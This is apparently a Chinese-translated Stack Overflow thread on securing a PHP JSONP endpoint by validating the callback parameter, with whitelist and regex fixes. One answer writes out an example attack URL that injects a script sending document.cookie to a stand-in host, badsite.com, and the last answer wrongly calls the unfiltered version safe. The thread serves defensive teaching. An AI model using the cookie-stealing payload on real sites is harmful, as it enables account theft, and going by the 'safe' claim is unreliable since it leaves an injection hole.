提供 JSONP 是不是安全？

Posted 2023-03-03

【中文标题】提供 JSONP 是不是安全？

【英文标题】：Is this safe for providing JSONP?提供 JSONP 是否安全？

【发布时间】：2011-03-08 20:52:04

【问题描述】：

<?php header('content-type: application/json');

$json = json_encode($data);

echo isset($_GET['callback'])
    ? "$_GET['callback']($json)"
    : $json;

或者我是否应该过滤 $_GET['callback'] 变量，使其仅包含有效的 javascript 函数名称？如果有，什么是有效的 JavaScript 函数名？

还是没有用 JSONP 过滤那个变量？

---

当前解决方案： 在 http://www.geekality.net/?p=1021 上发布了有关我当前解决方案的博客。简而言之，目前，我有以下代码，希望它应该很安全：

<?php header('content-type: application/json; charset=utf-8');

function is_valid_callback($subject)

     $identifier_syntax
       = '/^[$_\pL][$_\pL\pMn\pMc\pNd\pPc\x200C\x200D]*+$/u';

     $reserved_words = array('break', 'do', 'instanceof', 'typeof', 'case',
       'else', 'new', 'var', 'catch', 'finally', 'return', 'void', 'continue', 
       'for', 'switch', 'while', 'debugger', 'function', 'this', 'with', 
       'default', 'if', 'throw', 'delete', 'in', 'try', 'class', 'enum', 
       'extends', 'super', 'const', 'export', 'import', 'implements', 'let', 
       'private', 'public', 'yield', 'interface', 'package', 'protected', 
       'static', 'null', 'true', 'false');

     return preg_match($identifier_syntax, $subject)
         && ! in_array(mb_strtolower($subject, 'UTF-8'), $reserved_words);


$data = array(1, 2, 3, 4, 5, 6, 7, 8, 9);
$json = json_encode($data);

# JSON if no callback
if( ! isset($_GET['callback']))
     exit( $json );

# JSONP if valid callback
if(is_valid_callback($_GET['callback']))
     exit( "$_GET['callback']($json)" );

# Otherwise, bad request
header('Status: 400 Bad Request', true, 400);

【问题讨论】：

由于 JSONP 实际上是 Javascript，mime 类型将是 text/javascript（或 application/javascript）。

@Casey: 哦，所以如果没有设置回调，我应该将内容类型设置为application/json，如果是，则设置为application/javascript？

理论上是的，但我认为很多浏览器实际上并没有关注 mime 类型。 :)

@zuallauz 它不拒绝包含这些单词的函数名称，只拒绝那些相等的函数名称。

那里的 preg_match 不允许名称间隔的回调。这是一个正则表达式：$identifier_syntax = '/^[$_\pL\.][$_\pL\pMn\pMc\pNd\pPc\x200C\x200D\.]*+$/u';

【参考方案1】：

否，如果您打算将 JSONP 限制为选择域。还要指定编码，否则不能访问 JSON 的人可能会进行 UTF-7 注入攻击。请改用此标头：

header('Content-Type: application/json; charset=utf-8');

如果它应该是公共 JSONP 服务，那么是的，它是安全的，并且还使用 application/javascript 而不是 application/json。

【讨论】：

哦，以前从未听说过。我想我会指定编码！

除了 JSONP 响应，您应该使用 application/javascript 而不是 application/json，因为 JSONP 实际上是 javascript 代码。

不一定安全。 JSONP 的工作原理是设置数据或调用函数，而不是在 JSONP 服务器的上下文中注入代码的能力。因此他必须过滤掉回调名称。

【参考方案2】：

为了安全起见，您应该对callback 进行编码以仅允许有效的 JS 函数名称。没什么复杂的，只是不要让最终开发人员注入 any javascript。 这是一些代码：

<?php

    header('Content-Type: application/json; charset=utf-8'); // Thanks Eli

    /**
     * Ensures that input string matches a set of whitelisted characters and
     * replaces unlisted ones with a replacement string (defaults to underscore).
     * @param string $orig The original text to filter.
     * @param string $replace The replacement string (default is underscore).
     * @param string The original text with bad characters replaced with $replace.
     * @link https://github.com/uuf6429/K2F/blob/master/K2F-DEV/core/security.php#L263
     */
    function strtoident($orig,$replace='')
        $orig=(string)$orig;                  // ensure input is a string
        for($i=0; $i<strlen($orig); $i++)
            $o=ord($orig$i);
            if(!(  (($o>=48) && ($o<=57))     // numbers
                || (($o>=97) && ($o<=122))    // lowercase
                || (($o>=65) && ($o<=90))     // uppercase
                || ($orig$i=='_')))         // underscore
                   $orig$i=$replace;        // check failed, use replacement
        
        return $orig;
    

    $json=json_encode($data)

    echo isset($_GET['callback'])
        ? strtoident($_GET['callback']).'('.$json.');'
        : $json;

?>

编辑：

原因是为了避免黑客将无辜的受害者指向：

http://yoursite.com/jsonp.php?callback=(function() $(document.body).append('<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>'); )//

可以分解为：

(function()
    $(document.body).append(
        '<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>'
    );
)//("whatever");

后一部分是您编码的 json，很容易被注释取消（尽管它们的漏洞利用没有必要）。 基本上，黑客会了解用户的 cookie（除其他外），这有助于他访问用户在您网站上的帐户。

编辑： UTF-8 兼容性。为了证实我的主张，read here。或者：

与 UTF-16 和 UTF-32 一样，UTF-8 可以表示 Unicode 字符集中的每个字符。与它们不同的是，它向后兼容 ASCII，避免了字节序和字节顺序标记 (BOM) 的复杂性。

【讨论】：

如果您有命名空间函数，您可能还需要允许句点。

@Svish - 函数本身仅适用于 ASCII 集。因此，如果您使用的是 UTF-8，则仅支持基本字符（因为 ASCII 中的“A”== UTF-8 中的“A”）。如果 OP 想要更多字符，他应该更改功能。 JW - 我不能 100% 确定它不会造成额外的麻烦。 OP 应自担风险添加此内容（和/或也可能询问其他人）。

我是 OP，这就是我问的原因：p 我完全明白，在那里做一些过滤是个好主意。而且我认为奇怪的字符无论如何都不会成为问题，因为只有少数特定字符会对 JavaScript 产生任何影响？

我是 OP，这就是为什么我问 :p whoopsies :P 关于其余的，是的。只要确保奇怪的字符没问题。

在这种情况下使用黑名单而不是白名单会更好吗？还是需要维护的 JavaScript 内容列表太长？

【参考方案3】：

我认为这是安全的。只要您不在另一个页面中回显 $_GET['callback'] 而不转义。提出请求的人可以放任何他想要的js，我认为这将永远是他的问题，而不是你的问题。本页提供了有效js函数名的定义：http://www.functionx.com/javascript/Lesson05.htm